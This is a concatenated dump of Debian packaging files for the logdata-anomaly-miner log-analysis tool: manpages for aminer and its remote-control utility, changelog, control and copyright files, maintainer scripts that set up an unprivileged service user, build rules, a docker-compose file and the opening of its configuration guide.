documentation about man-pages and man-page-formatting: man(1), man(7), http://www.tldp.org/HOWTO/Man-Page/ --> ]> &dhtitle; &dhpackage; &dhfirstname; &dhsurname; Wrote this manpage for the Debian system.
&dhemail;
2016 &dhusername; This manual page was written for the Debian system (and may be used by others). Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 3. On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL.
AMINER &dhsection; aminer lightweight tool for log checking, log analysis aminer DESCRIPTION This manual page documents briefly the aminer command. For more details see packaged documentation at /usr/share/doc/logdata-anomaly-miner. OPTIONS Specify the configuration file, otherwise /etc/aminer/config.py is used. See /etc/aminer/template_config.py or /etc/aminer/template_config.yml for configuration file templates and examples. With this parameter, aminer will detach from the terminal and daemonize. When not in foreground mode, aminer will also change the working directory to /, hence relative path in configuration file will not work. Set the statistic logging level. Possible stat-levels are 0 for no statistics, 1 (default) for normal statistic level and 2 for verbose statistics. Set the debug logging level. Possible debug-levels are 0 for no debugging, 1 (default) for normal output (INFO and above), 2 for printing all debug information. INTERNAL PARAMETER - DO NOT USE. It is just documented here for completeness. Restores the persistence directory from backup-directory. With this parameter all persisted data in config_properties['Core.PersistenceDir'] is deleted. USE THIS PARAMETER CAREFULLY. IT DELETES ALL SUB-DIRECTORIES OF THE PERSISTENCE DIRECTORY. Remove persisted data of one Detector. --remove NewMatchPathDetector --remove NewMatchPathDetector --remove EventCorrelationDetector With this parameter all live data in config_properties['Core.PersistenceDir']/AnalysisChild/RepositioningData is deleted. Prints the help-screen Prints the version-string FILES /etc/aminer/config.py The main configuration file for the aminer daemon. See /etc/aminer/template_config.py and /etc/aminer/template_config.yml for configuration file templates and examples. BUGS Report bugs via your distribution's bug tracking system. For bugs in the the software trunk, report via at . At startup, aminer will quite likely print out some security warnings to increase transparency. 
They are here just to remind you of the limitations of the current implementation. They should be the same as for nearly all other programs on your platform, just that others do not tell you. See the source code documentation for a short explanation of why a given part of the implementation is not as secure as it could be when leveraging the security features a platform could provide you. SEE ALSO aminerremotecontrol1
logdata-anomaly-miner-2.6.1/debian/aminerremotecontrol.1.xml000077500000000000000000001044371437606560100241200ustar00rootroot00000000000000 .
will be generated. You may view the manual page with: nroff -man .
| less'. A typical entry in a Makefile or Makefile.am is: DB2MAN = /usr/share/sgml/docbook/stylesheet/xsl/docbook-xsl/manpages/docbook.xsl XP = xsltproc -''-nonet -''-param man.charmap.use.subset "0" manpage.1: manpage.xml $(XP) $(DB2MAN) $< The xsltproc binary is found in the xsltproc package. The XSL files are in docbook-xsl. A description of the parameters you can use can be found in the docbook-xsl-doc-* packages. Please remember that if you create the nroff version in one of the debian/rules file targets (such as build), you will need to include xsltproc and docbook-xsl in your Build-Depends control field. Alternatively use the xmlto command/package. That will also automatically pull in xsltproc and docbook-xsl. Notes for using docbook2x: docbook2x-man does not automatically create the AUTHOR(S) and COPYRIGHT sections. In this case, please add them manually as ... . To disable the automatic creation of the AUTHOR(S) and COPYRIGHT sections read /usr/share/doc/docbook-xsl/doc/manpages/authors.html. This file can be found in the docbook-xsl-doc-html package. Validation can be done using: `xmllint -''-noout -''-valid manpage.xml` General documentation about man-pages and man-page-formatting: man(1), man(7), http://www.tldp.org/HOWTO/Man-Page/ --> ]> &dhtitle; &dhpackage; &dhfirstname; &dhsurname; Wrote this manpage for the Debian system.
&dhemail;
2016 &dhusername; This manual page was written for the Debian system (and may be used by others). Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 3. On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL.
AMINERREMOTECONTROL &dhsection; aminerremotecontrol lightweight tool for log checking, log analysis aminerremotecontrol command file DESCRIPTION This manual page documents briefly the aminerremotecontrol command. The command executes arbitrary remote control commands in a running aminer child process. As child process is usually running with lowered privileges or SELinux/AppArmor confinement, you may observe unexpected results when accessing resources outside the child process, e.g. files. For more details see also packaged documentation at /usr/share/doc/logdata-anomaly-miner. Example usecases: /usr/bin/aminerremotecontrol --data '["LogResourceList"]' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' /usr/bin/aminerremotecontrol --exec 'print_current_config(analysis_context)' /usr/bin/aminerremotecontrol --data '["Resources.MaxMemoryUsage", -1]' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' --exec 'change_config_property(analysis_context, "%s" % remote_control_data[0], remote_control_data[1])' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' OPTIONS with long options starting with two dashes ('-'). A summary of options is included below. For a complete description, see the info 1 files. socket Specify the Unix domain remote control socket path, otherwise /var/run/aminer-remote.socket is used. The socket is opened by aminer when 'RemoteControlSocket' feature is enabled in configuration. As the socket is of SOCK_STREAM type, it may also be forwarded via any other stream forwarders, e.g. socat (see UNIX-CONNECT and UNIX-LISTEN) and SSH (see LocalForward, DynamicForward). Access control is only done by file system permissions (DAC) of the socket, so make sure not to widen the access on error. command For each --exec option, the next argument is sent in a separate remote execution request using additional execution data (see --data). 
The command is executed in a separate execution namespace with only some variables added to the local namespace, e.g. execution data is available as 'remote_control_data'. When setting the local variable 'remoteControlResponse' within the executed command, the object is serialized using json and sent back in the response. file For each --exec-file option, the named file is loaded and content submitted in the very same way as if --exec parameter with content as string would have been used. data This parameter defines a json string defining Python objects, that will be sent with all subsequent --exec operations until changed again using another --data option. Take into account, that there are size limits for the request, very large data objects may exceed those limits. The execution context will expose the data as variable 'remote_control_data'. When set, aminerremotecontrol will not pass the result to repr. The returned object is just converted to a plain string via str(object) and the result is printed to avoid escaping of quotation marks, newlines, .... WARNING: This might be insecure: without escaping the printed data may contain terminal control sequences to exploit vulnerabilities or misconfiguration of your terminal to execute code with privileges of terminal or the process calling aminerremotecontrol (usually root). Commands This method allows you to change properties from the AminerConfig at runtime. For every property to be changed this method must be used. The method prints "property_name changed to value successfully." if the changes were successful and an individual message if the changes failed. Read more about which properties can be changed in the section. This method allows you to change attributes from components of the AminerConfig at runtime. For every attribute to be changed this method must be used. The method prints "component_name.attribute changed to value successfully. 
" if the changes were successful and an individual message if the changes failed. The type of the new value must be the same like the old value of the component_name.attribute example: aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPath','learn_mode', False)" Renames the component from the old_component_name to new_component_name. Therefore the component with the old_component_name is deleted from the registered components and registered with the new_component_name. example: aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPath','NewMatchPathDetector')" Adds the component to the atom_filter and registers it with the component_name. example: aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context,'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True),'NewMatchPathDet')" Prints the property with the property_name from the current AminerConfig. example: aminerremotecontrol --exec "print_config_property(analysis_context,'LogResourceList')" Prints the attribute of the component with the component_name. example: aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context,'NewMatchPath','learn_mode')" Prints the current AminerConfig. It is strongly recommended to use the parameter for better readability. example: aminerremotecontrol --exec "print_current_config(analysis_context)" --string-response Saves the current AminerConfig into destination_file. destination_file must have write permissions by the aminerremotecontrol process or it returns an . example: aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')" Saves all persistence data by calling PersistenceUtil.persist_all(). 
example: aminerremotecontrol --exec "persist_all()" Creates a backup of the current persistence directory and saves it in {persistence_dir}/backup/{timestamp}. Use this preferably after persist_all(). example: aminerremotecontrol --exec "create_backup()" Returns a list of all existing persistence backups. example: aminerremotecontrol --exec "list_backups()" Allowlists a path from event_data with the allowlist_event-method from the corresponding class of the component with the component_name. Only the following classes support allowlisting: EnhancedNewMatchPathValueComboDetector, MissingMatchPathValueDetector, NewMatchPathDetector and NewMatchPathValueComboDetector. For most of the components no allowlisting_data is needed and the event_data is a path. The NewMatchPathDetector supports a list of multiple pathes. The MissingMatchPathValueComboDetector needs an integer as allowlisting_data. A positive value sets the interval in seconds to the value. -1 sets the interval to the default value of 3600. A negative value removes the missingMatchPath. Please read the examples of this method to use the correct parameters. example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EnhancedNewMatchPathValueComboDetector','new/path')" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'MissingMatchPathValueDetector','new/path',-11)" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathDetector',['new/path'])" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector','new/path')" This method returns the string representation of a history event with the dump_event_id. If no event with the dump_event_id could be found, the message "FAILURE: the event with dump_event_id could not be found!" is returned. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. 
example: aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',12)" This method deletes the events with the event_ids from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. The number of deleted events is returned. example: aminerremotecontrol --exec "ignore_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" This method lists max_event_count events from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. If max_event_count is None, all events from the history are returned. example: aminerremotecontrol --exec "list_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',600)" This method allowlists the events with the ids in the id_spec_list from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. The allowlisting response is returned. example: aminerremotecontrol --exec "allowlist_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" Reopen all StreamPrinterEventHandler streams for log rotation. example: aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)" Valid Property Names MailAlerting.TargetAddress Value: 'E-Mail Address' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.TargetAddress', 'root@localhost')" Define a target e-mail address to send alerts to. When undefined, no e-mail notification hooks are added. MailAlerting.FromAddress Value: 'E-Mail Address' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.FromAddress', 'root@localhost')" Sender address of e-mail alerts. 
MailAlerting.SubjectPrefix Value: 'String' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.SubjectPrefix', 'aminer Alerts:')" Define, which text should be prepended to the standard aminer subject. Defaults to "aminer Alerts:" MailAlerting.EventCollectTime Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.EventCollectTime', 10)" Define how many seconds to wait after a first event triggered the alerting procedure before really sending out the e-mail. In that timespan, events are collected and will be sent all using a single e-mail. Defaults to 10 seconds. MailAlerting.MinAlertGap Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MinAlertGap', 600)" Define the minimum time between two alert e-mails in seconds to avoid spamming. All events during this timespan are collected and sent out with the next report. Defaults to 600 seconds. MailAlerting.MaxAlertGap Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MaxAlertGap', 1000)" Define the maximum time between two alert e-mails in seconds. When undefined this defaults to "MailAlerting.MinAlertGap". Otherwise this will activate an exponential backoff to reduce messages during permanent error states by increasing the alert gap by 50% when more alert-worthy events were recorded while the previous gap time was not yet elapsed. MailAlerting.MaxEventsPerMessage Value: Number of messages (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MaxEventsPerMessage',1000)" Define how many events should be included in one alert mail at most. This defaults to 1000. 
LogPrefix Value: 'String' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'LogPrefix','Original log line: ')" Most analysis components implement the output_logline-property, which is True by default. Define a prefix to the original captured log lines. This defaults to ''. Resources.MaxMemoryUsage Value: 'Allowed RAM usage in Megabytes (Integer: 32-maxSystemRAM)' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Resources.MaxMemoryUsage', -1)" This property limits the maximal possible RAM in MB which the aminer process can use. Be careful at choosing the value, as a shortage of memory causes a MemoryError. This defaults to -1, which means that there is no limit. Core.PersistencePeriod Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Core.PersistencePeriod', 300)" Use this property to change the time between persisting data in analysis components. Defaults to 600 seconds. Log.StatisticsLevel Value: Level [0, 1, 2] Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.StatisticsLevel',2)" Change the amount of data saved in statistics. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for verbose statistics. Defaults to 1. Log.DebugLevel Value: Level [0, 1, 2] Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.DebugLevel',2)" Change the debug logging level. Possible debug-levels are 0 for no logging, 1 for normal output (INFO and above), 2 for printing all debug information. Defaults to 1. Log.StatisticsPeriod Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.StatisticsPeriod', 360)" Change how often statistics are logged and reset. This defaults to 3600 seconds. FILES /var/run/aminer-remote.socket This is the default remote control socket used when not changed using the --control-socket option. 
BUGS Report bugs via your distribution's bug tracking system. For bugs in the software trunk, report via at . SEE ALSO aminer 1
logdata-anomaly-miner-2.6.1/debian/changelog000066400000000000000000000122771437606560100210160ustar00rootroot00000000000000logdata-anomaly-miner (2.6.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.6.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.6.1 logdata-anomaly-miner (2.6.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.6.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.6.0 logdata-anomaly-miner (2.5.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.5.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.5.1 logdata-anomaly-miner (2.5.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.5.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.5.0 [ Sebastian Ramacher ] * debian/rules: Remove obsolete override * debian/control: Bump Standards-Version -- Markus Wurzenberger Mon, 06 Dec 2021 11:02:01 +0100 logdata-anomaly-miner (2.4.2-1) unstable; urgency=low * New upstream release V2.4.2, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.2 -- Markus Wurzenberger Tue, 23 Nov 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.1-1) unstable; urgency=low * New upstream release V2.4.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.1 -- Markus Wurzenberger Fri, 23 Jul 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.0-1) unstable; urgency=low * New upstream release V2.4.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.0 -- Markus Wurzenberger Fri, 04 Jun 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.1-1) unstable; urgency=low * New upstream release V2.3.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.3.1 -- Markus Wurzenberger Thu, 08 Apr 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.0-1) unstable; urgency=low * New upstream release V2.3.0, see 
https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.3.0 -- Markus Wurzenberger Mon, 29 Mar 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.2.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.2.1 [ Sebastian Ramacher ] * debian/patches: Removed, integrated upstream -- Markus Wurzenberger Mon, 25 Jan 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.2.0 [ Sebastian Ramacher ] * debian/control: - Bump Standards-Version - Set RRR: no * debian/logdata-anomaly-miner.maintscript: Move conffiles to new location * debian/logdata-anomaly-miner.links: Add link for aminer-peristence.py * debian/patches: Add hashbang to aminer-peristence.py * debian/rules: - Simplify rules by using execute_before_dh_auto_build target - Remove executable bits of some Python modules -- Markus Wurzenberger Tue, 22 Dec 2020 12:20:17 +0100 logdata-anomaly-miner (2.0.1-1) unstable; urgency=low * New upstream release V2.0.1 * Bump debhelper compat to 13 * Switch to new upstream location on Github * Update description * Provide upstream metadata -- Markus Wurzenberger Tue, 30 Jun 2020 14:42:46 +0200 logdata-anomaly-miner (1.0.0-1) unstable; urgency=low * New upstream release V1.0.0, see https://launchpad.net/logdata-anomaly-miner/+milestone/v1.0.0 -- Markus Wurzenberger Tue, 2 Oct 2018 17:00:00 +0000 logdata-anomaly-miner (0.0.8-1) unstable; urgency=low * New upstream release V0.0.8, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.8 -- Roman Fiedler Tue, 30 May 2017 17:00:00 +0000 logdata-anomaly-miner (0.0.7-1) unstable; urgency=low * New upstream release V0.0.7, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.7 -- Roman Fiedler Mon, 9 Jan 2017 18:00:00 +0000 logdata-anomaly-miner (0.0.6-1) unstable; urgency=low * New upstream release V0.0.6, see 
https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.6 -- Roman Fiedler Fri, 4 Nov 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.5-1) unstable; urgency=low * New upstream release (Closes: #840447). -- Roman Fiedler Tue, 11 Oct 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.3-2) unstable; urgency=low * Packaging fix: unowned directory after purge (Closes: #832347). -- Roman Fiedler Tue, 2 Aug 2016 15:15:00 +0000 logdata-anomaly-miner (0.0.3-1) unstable; urgency=low * New upstream release (Closes: #832058). -- Roman Fiedler Thu, 21 Jul 2016 19:00:00 +0000 logdata-anomaly-miner (0.0.2-1) unstable; urgency=low * Initial inclusion of logdata-anomaly-miner to Debian (Closes: #813096) -- Roman Fiedler Thu, 9 Jun 2016 12:00:00 +0000 logdata-anomaly-miner-2.6.1/debian/control000066400000000000000000000025501437606560100205400ustar00rootroot00000000000000Source: logdata-anomaly-miner Section: admin Priority: optional Maintainer: Markus Wurzenberger Build-Depends: debhelper-compat (= 13), dh-python, docbook-xsl, docbook-xml, python3, xsltproc Standards-Version: 4.6.0 Homepage: https://aecid.ait.ac.at/ Vcs-Git: https://github.com/ait-aecid/logdata-anomaly-miner.git Vcs-Browser: https://github.com/ait-aecid/logdata-anomaly-miner Rules-Requires-Root: no Package: logdata-anomaly-miner Architecture: all Depends: ${python3:Depends}, python3-tz, ${misc:Depends}, python3-cerberus, python3-pkg-resources, python3-setuptools Suggests: python3-scipy Description: tool for log analysis pipelines This tool allows one to analyze log data streams and detect violations or anomalies in it. It can be run from console, as daemon with e-mail alerting, or embedded as library into own programs. It was designed to run the analysis with limited resources and lowest possible permissions to make it suitable for production server use. Analysis methods include: . 
* log line parsing and filtering with extended syntax and options * detection of new data elements (IPs, user names, MAC addresses) * statistical anomalies in log line values and frequencies * correlation rules between log lines . The tool is suitable to operate as a sensor feeding a SIEM and distributing messages via message queues. logdata-anomaly-miner-2.6.1/debian/copyright000066400000000000000000000036041437606560100210710ustar00rootroot00000000000000Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ Upstream-Name: logdata-anomaly-miner Source: https://github.com/ait-aecid/logdata-anomaly-miner.git Files: * Copyright: 2016-2018, Roman Fiedler 2018-2021, Markus Wurzenberger 2018-2021, Max Landauer 2019-2021, Wolfgang Hotwagner 2019-2021, Ernst Leierzopf 2020-2021, Georg Hoeld 2016-2021, AIT Austrian Institute of Technology GmbH License: GPL-3.0+ Files: debian/* Copyright: 2016-2018, Roman Fiedler 2018-2021, Markus Wurzenberger 2018-2021, Max Landauer 2019-2021, Wolfgang Hotwagner 2019-2021, Ernst Leierzopf 2020-2021, Georg Hoeld 2016-2021, AIT Austrian Institute of Technology GmbH License: GPL-3.0+ License: GPL-3.0+ This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. . This package is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. . You should have received a copy of the GNU General Public License along with this program. If not, see . . On Debian systems, the complete text of the GNU General Public License version 3 can be found in "/usr/share/common-licenses/GPL-3". 
logdata-anomaly-miner-2.6.1/debian/dirs000066400000000000000000000000171437606560100200150ustar00rootroot00000000000000var/lib/aminer logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.docs000066400000000000000000000000241437606560100241620ustar00rootroot00000000000000README.md changelog logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.install000066400000000000000000000000201437606560100246740ustar00rootroot00000000000000source/root/* / logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.links000066400000000000000000000003351437606560100243570ustar00rootroot00000000000000/usr/lib/logdata-anomaly-miner/aminer.py /usr/bin/aminer /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py /usr/bin/aminerremotecontrol /usr/lib/logdata-anomaly-miner/aminer-persistence.py /usr/bin/aminer-persistence logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.maintscript000066400000000000000000000003511437606560100255720ustar00rootroot00000000000000rm_conffile /etc/aminer/config.py.template 2.0.1-1~ rm_conffile /etc/init/aminer.conf 2.0.1-1~ mv_conffile /etc/aminer/conf-available/generic/EximParsingModel.py /etc/aminer/conf-available/generic/EximGenericParsingModel.py 2.2.0-1~ logdata-anomaly-miner-2.6.1/debian/logdata-anomaly-miner.manpages000066400000000000000000000000551437606560100250310ustar00rootroot00000000000000debian/aminer.1 debian/aminerremotecontrol.1 logdata-anomaly-miner-2.6.1/debian/postinst000077500000000000000000000023621437606560100207470ustar00rootroot00000000000000#!/bin/sh # postinst script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `configure' # * `abort-upgrade' # * `abort-remove' `in-favour' # # * `abort-remove' # * `abort-deconfigure' `in-favour' # `removing' # # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in configure) analysisUser="aminer" analysisGroup="aminer" # Prohibit read access to configuration for other 
processes if ! dpkg-statoverride --list /etc/aminer > /dev/null; then chown "root.${analysisGroup}" -- /etc/aminer chmod 00750 -- /etc/aminer fi if ! dpkg-statoverride --list /var/lib/aminer > /dev/null; then chmod 00700 -- /var/lib/aminer chown "${analysisUser}.${analysisGroup}" -- /var/lib/aminer fi ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.6.1/debian/postrm000077500000000000000000000015171437606560100204110ustar00rootroot00000000000000#!/bin/sh # postrm script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `remove' # * `purge' # * `upgrade' # * `failed-upgrade' # * `abort-install' # * `abort-install' # * `abort-upgrade' # * `disappear' # # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in remove) # Delete user, will also delete group. userdel "aminer" ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.6.1/debian/preinst000077500000000000000000000033201437606560100205430ustar00rootroot00000000000000#!/bin/sh # preinst script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `install' # * `install' # * `upgrade' # * `abort-upgrade' # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in install) # Create the user to run the analysis service. analysisGroup="aminer" if [ "$(getent group "${analysisGroup}")" = "" ]; then # Add a separate group for aitmon. # The group does not need to be a system group, but low gid is # preferable to avoid mixing with user groups. Using '--system' # flag would cause gid allocation to go down from UID_MIN, not # up from SYS_GID_MIN, so avoid using --system. 
groupadd -K GID_MIN=100 -K GID_MAX=1000 "${analysisGroup}" fi analysisUser="aminer" if [ "$(getent passwd "${analysisUser}")" = "" ]; then # Add a system user, set home directory to nonexisting directory # to avoid loading of user-defined files. Create user without # using '--system' flag, thus allocating UIDs upwards. useradd -M --shell /usr/sbin/nologin --gid "${analysisGroup}" -K PASS_MAX_DAYS=-1 -K UID_MIN=100 -K UID_MAX=999 --home /nonexistent "${analysisUser}" # There is no way to make useradd ommit assignment of subuids, # so remove them immediately on affected systems. if test -e /etc/subuid; then usermod --del-subuids 1-4294967295 --del-subgids 1-4294967295 "${analysisUser}" fi fi ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.6.1/debian/rules000077500000000000000000000014551437606560100202200ustar00rootroot00000000000000#!/usr/bin/make -f # -*- makefile -*- # Uncomment this to turn on verbose mode. # export DH_VERBOSE=1 %: dh $@ --with=python3 execute_before_dh_auto_build: xsltproc --nonet \ --param make.year.ranges 1 \ --param make.single.year.ranges 1 \ --param man.charmap.use.subset 0 \ -o debian/ \ http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl \ debian/aminer.1.xml debian/aminerremotecontrol.1.xml # Modify startup behaviour in auto-generated code in postinst: # Do not attempt to add aminer.service to autostart if user does # not want to have it running explicitely. See "Running as a Service" # from /usr/share/doc/aminer/Readme.txt.gz for more information. 
override_dh_installsystemd: dh_installsystemd --no-enable override_dh_installchangelogs: dh_installchangelogs changelog logdata-anomaly-miner-2.6.1/debian/source/000077500000000000000000000000001437606560100204335ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/debian/source/format000066400000000000000000000000141437606560100216410ustar00rootroot000000000000003.0 (quilt) logdata-anomaly-miner-2.6.1/debian/upstream/000077500000000000000000000000001437606560100207735ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/debian/upstream/metadata000066400000000000000000000021501437606560100224740ustar00rootroot00000000000000Bug-Database: https://github.com/ait-aecid/logdata-anomaly-miner/issues Bug-Submit: https://github.com/ait-aecid/logdata-anomaly-miner/issues/new Changelog: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/changelog Documentation: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/README.md Other-References: https://aecid.ait.ac.at/further-information/ Reference: - Author: Markus Wurzenberger and Florian Skopik and Giuseppe Settanni and Roman Fiedler Booktitle: Proceedings of the 4th International Conference on Information Systems Security and Privacy DOI: 10.5220/0006643003860397 ISBN: 978-989-758-282-0 Pages: 386-397 Publisher: SciTePress Title: "AECID: A Self-learning Anomaly Detection Approach based on Light-weight Log Parser Models" Type: inproceedings URL: https://www.scitepress.org/Link.aspx?doi=10.5220/0006643003860397 Year: 2018 Repository: https://github.com/ait-aecid/logdata-anomaly-miner.git Repository-Browse: https://github.com/ait-aecid/logdata-anomaly-miner Security-Contact: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/SECURITY.md logdata-anomaly-miner-2.6.1/debian/watch000066400000000000000000000003041437606560100201610ustar00rootroot00000000000000version=4 opts="filenamemangle=s%(?:.*?)?V?(\d[\d.]*)\.tar\.gz%logdata-anomaly-miner-$1.tar.gz%" \ 
https://github.com/ait-aecid/logdata-anomaly-miner/tags \ (?:.*?/)?V?(\d[\d.]*)\.tar\.gz logdata-anomaly-miner-2.6.1/docker-compose.yml000066400000000000000000000015611437606560100213510ustar00rootroot00000000000000version: "3" services: redpanda: image: docker.vectorized.io/vectorized/redpanda:latest command: ['start --overprovisioned --smp 1 --memory 1G --reserve-memory 0M --node-id 0 --check=false'] ports: - "9092:9092" - "9644:9644" akafka: image: aitaecid/akafka:latest environment: KAFKA_TOPICS: '["aminer"]' KAFKA_BOOTSTRAP_SERVERS: redpanda volumes: - '$PWD/akafka:/var/lib/akafka' links: - redpanda depends_on: - redpanda aminer: build: context: . volumes: - '$PWD/akafka:/var/lib/akafka' - '$PWD/aminercfg:/etc/aminer' - '$PWD/persistency:/var/lib/aminer' - '$PWD/logs:/logs' depends_on: - akafka logdata-anomaly-miner-2.6.1/docs/000077500000000000000000000000001437606560100166415ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/docs/CONFIGURATION.rst000066400000000000000000003326001437606560100214060ustar00rootroot00000000000000.. _Overview: ======== Overview ======== The logdata-anomaly-miner can be configured in two different formats: **yaml** and **python**. The preferred format is yaml and the default configuration file for it is */etc/aminer/config.yaml*. The python format can be configured in */etc/aminer/config.py* and offers advanced possibilities to configure the logdata-anomaly-miner. However, this is only recommended for experts, as no errors are caught in the python configuration, which can make debugging very difficult. For both formats there are template configurations in */etc/aminer/template\_config.yaml* and */etc/aminer/template\_config.py*. The basic structure of the logdata-anomaly-miner is illustrated in the folloging diagram: .. 
image:: images/aminer-config-color.png :alt: Structure of the configuration-file: GENERAL, INPUT, PARSING, ANALYSING, EVENTHANDLING ----------------- Analysis Pipeline ----------------- The core component of the logdata-anomaly-miner is the "analysis pipeline". It consists of the parts INPUT, ANALYSIS and OUTPUT. .. image:: images/analysis-pipeline.png :alt: Parts of the analysis-pipeline ======================= Command-line Parameters ======================= ---------- -h, --help ---------- Show the help message and exit. ------------- -v, --version ------------- Show program's version number and exit. ------------------- -u, --check-updates ------------------- Check if updates for the aminer are available and exit. -------------------------- -c CONFIG, --config CONFIG -------------------------- * Default: /etc/aminer/config.yml Use the settings of the file CONFIG on startup. Two config-variants are allowed: python and yaml. .. seealso:: :ref:`Overview` ------------ -D, --daemon ------------ Run aminer as a daemon process. -------------------------- -s {0,1,2}, --stat {0,1,2} -------------------------- Set the stat level. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for verbose statistics. --------------------------- -d {0,1,2}, --debug {0,1,2} --------------------------- Set the debug level. Possible debug-levels are 0 for no debugging, 1 for normal output (INFO and above), 2 for printing all debug information. -------------- --run-analysis -------------- Run aminer analysis-child. .. note:: This parameter is for internal use only. ----------- -C, --clear ----------- Remove all persistence directories and run aminer. 